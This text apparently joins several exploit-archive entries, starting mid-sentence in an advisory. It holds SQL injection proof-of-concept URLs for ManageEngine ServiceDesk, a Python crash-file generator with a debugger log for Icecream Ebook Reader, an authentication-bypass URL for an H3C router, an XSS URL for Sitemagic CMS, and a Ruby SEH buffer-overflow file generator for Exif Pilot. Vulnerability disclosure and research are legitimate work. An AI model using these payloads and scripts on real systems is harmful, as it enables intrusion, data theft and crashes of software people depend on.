project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
==================
Class: SQL Injection Vulnerability
Impact: An Authenticated user could exploit this vulnerability to gain
complete system access.
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
==================
CreateReportTable.jsp page is prone to SQL injection via site
variable. A user with limited privileges could exploit this
vulnerability to gain complete database/system access.
Proof-of-Concept
=============
Postgres DB:
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 AND
3133=(SELECT 3133 FROM PG_SLEEP(1))
MySQL DB:
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 AND UNION
ALL SELECT user(),NULL,NULL,NULL,NULL
Timeline
======
23-Dec-2014 – Notification to Vendor
24-Dec-2014 – Response from Vendor
30-Dec-2014 – Vulnerability fixed by Vendor
About Rewterz
===========
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories
# Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
# Date: [23/01/2015]
# Exploit Author: [Kapil Soni]
# Twitter: [@Haxinos]
# Vendor Homepage: [http://icecreamapps.com/]
# Version: [Icecream Ebook Reader v1.41]
# Tested on: [Windows XP SP2]
#Technical Details & Description:
#================================
#A Memory Corruption Vulnerability is detected on Icecream Ebook Reader v1.41. An attacker can crash the software by using .mobi and .prc file.
#Attackers can crash the software local by user inter action over .mobi and .prc (ebooks).
#Piece of Code
#========================================================================
#!/usr/bin/python
buffer = "A"*1000
filename = "crash"+".mobi" # For testing with .prc, change the extension
file = open(filename, 'w')
file.write(buffer)
file.close()
print "File Successfully Created [1]"
#========================================================================
#Debugging and Error Log
#========================
#Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
#Copyright (c) Microsoft Corporation. All rights reserved.
#*** wait with pending attach
#Symbol search path is: *** Invalid ***
#****************************************************************************
#* Symbol loading may be unreliable without a symbol search path. *
#* Use .symfix to have the debugger choose a symbol path. *
#* After setting your symbol path, use .reload to refresh symbol locations. *
#****************************************************************************
#Executable search path is:
#ModLoad: 00400000 00bd2000 C:\Program Files\Icecream Ebook Reader\ebookreader.exe
#ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
#ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
#ModLoad: 67000000 673f1000 C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
#ModLoad: 00d30000 01158000 C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
#.... Snipped
#ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\userenv.dll
#ModLoad: 01960000 0196c000 C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
#ModLoad: 01970000 01979000 C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
#ModLoad: 01b10000 01b18000 C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
#ModLoad: 01b20000 01b66000 C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
#ModLoad: 09e70000 09f0f000 C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
#ModLoad: 20000000 202c5000 C:\WINDOWS\system32\xpsp2res.dll
#(f9c.e34): Break instruction exception - code 80000003 (first chance)
#eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
#ntdll!DbgBreakPoint:
#7c901230 cc int 3
#0:003> g
#ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\Comdlg32.dll
#ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll
#ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
#ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
#... Snipped
#ModLoad: 771b0000 77256000 C:\WINDOWS\system32\WININET.dll
#ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll
#ModLoad: 74e30000 74e9c000 C:\WINDOWS\system32\RichEd20.dll
#ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll
#QIODevice::read: Called with maxSize < 0
#QIODevice::read: Called with maxSize < 0
#(f9c.998): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
#eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0 nv up ei pl nz na pe cy
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll -
#Qt5Core!QTextCodec::toUnicode+0x7:
#671da2a7 8b11 mov edx,dword ptr [ecx] ds:0023:00000000=????????
#Exploitation Technique:
#============================
#Local, DoS, Memory Corruption
#Solution - Fix & Patch:
#=======================
#Restrict working maximum size & set a own exception-handling for over-sized requests.
#Author:
#=======
#Kapil Soni (Haxinos)
source: https://www.securityfocus.com/bid/48384/info
The H3C ER5100 is prone to a remote authentication-bypass vulnerability.
Attackers can exploit this issue to bypass the authentication mechanism and perform unauthorized actions.
http://www.example.com:8080/home.asp?userLogin.asp
http://www.example.com:8080/wan_NAT.asp?userLogin.asp
source: https://www.securityfocus.com/bid/48355/info
Sitemagic CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Sitemagic CMS 2010.04.17 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?SMExt=[xss]
#!/usr/bin/env ruby
# Exploit Title: Exif Pilot SEH Based Buffer Overflow
# Version: version 4.7.2
# Download: http://www.colorpilot.com/load/exif.exe
# Tested on: Windows XP sp2
# Exploit Author: Osanda M. Jayathissa
# E-Mail: osanda[cat]unseen.is
=begin
Click Tools > Options > Customize 35mm tab > Import > and choose "output.xml".
The p/p/r addresses contains null characters.
=end
require 'rex'
def generate_content(padding1_len, padding2_len)
header = "\xff\xfe"
header << Rex::Text.to_unicode("<?xml version=\"1.0\" encoding=\"UTF-16\" ?>")
header << "\x0d\x00\x0a\x00"
header << Rex::Text.to_unicode("<efls>")
header << "\x0d\x00\x0a\x00"
header << Rex::Text.to_unicode(" <eflitem>")
header << "\x0d\x00\x0a\x00"
header << Rex::Text.to_unicode(" <maker>");
header << Rex::Text.to_unicode("");
for i in 0..padding1_len
header << Rex::Text.to_unicode("A");
end
header << "\xeb\x00\x06\x00\x90\x00\x90\x00" #nSEH
header << Rex::Text.to_unicode("CCCC"); #SEH
for i in 0..padding2_len
header << Rex::Text.to_unicode("A");
end
header << "\x0d\x00\x0a\x00\x09\x00\x09\x00"
header << Rex::Text.to_unicode(" </maker>")
header << "\x0d\x00\x0a\x00"
header << Rex::Text.to_unicode(" <model>abc</model>")
header << "\x0d\x00\x0a\x00"
header << Rex::Text.to_unicode(" <factor>0.000000</factor>")
header << "\x0d\x00\x0a\x00"
header << Rex::Text.to_unicode(" </eflitem>")
header << "\x0d\x00\x0a\x00"
header << Rex::Text.to_unicode("</efls>")
header << "\x0d\x00\x0a\x00"
return header
end
##
# main
##
filename = 'output.xml'
output_handle = File.new(filename, 'wb')
if !output_handle
$stdout.puts "Cannot open the file #{filename} for writing!"
exit -1
end
header = generate_content(1619, 7000)
$stdout.puts "Generating file #{filename}"
output_handle.puts header
output_handle.close
$stdout.puts "Done!"
exit 0
#EOF